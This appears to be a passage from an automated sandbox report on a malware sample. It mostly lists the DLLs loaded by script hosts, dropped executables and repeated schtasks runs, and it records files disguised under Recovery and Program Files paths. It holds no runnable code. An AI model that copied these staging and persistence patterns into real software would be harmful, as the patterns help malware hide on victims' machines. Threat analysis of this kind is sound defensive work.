Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Section loaded: apphelp.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: mscoree.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: apphelp.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: version.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: uxtheme.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: wldp.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: profapi.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: sspicli.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: mscoree.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: version.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: uxtheme.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: wldp.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: profapi.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: sspicli.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: amsi.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: userenv.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: propsys.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: edputil.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: urlmon.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: iertutil.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: srvcli.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: netutils.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: policymanager.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: msvcp110_win.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: wintypes.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: appresolver.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: bcp47langs.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: slc.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: sppc.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: ntmarta.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: rasapi32.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: rasman.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: rtutils.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: mswsock.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: winhttp.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: iphlpapi.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: dhcpcsvc.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: dnsapi.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: winnsi.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: rasadhlp.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: fwpuclnt.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: wbemcomn.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: winmm.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: winmmbase.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: mmdevapi.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: devobj.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: ksuser.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: avrt.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: audioses.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: powrprof.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: umpdc.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: msacm32.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: midimap.dll
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: kernel.appcore.dll

Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Directory created: C:\Program Files\Common Files\microsoft shared\UplbXNLOfTNXjbhPJQLmKdgT.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Directory created: C:\Program Files\Common Files\microsoft shared\330defd625eedf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Directory created: C:\Program Files\Windows Multimedia Platform\UplbXNLOfTNXjbhPJQLmKdgT.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Directory created: C:\Program Files\Windows Multimedia Platform\330defd625eedf	Jump to behavior

Source: LaRHzSijsq.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: LaRHzSijsq.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

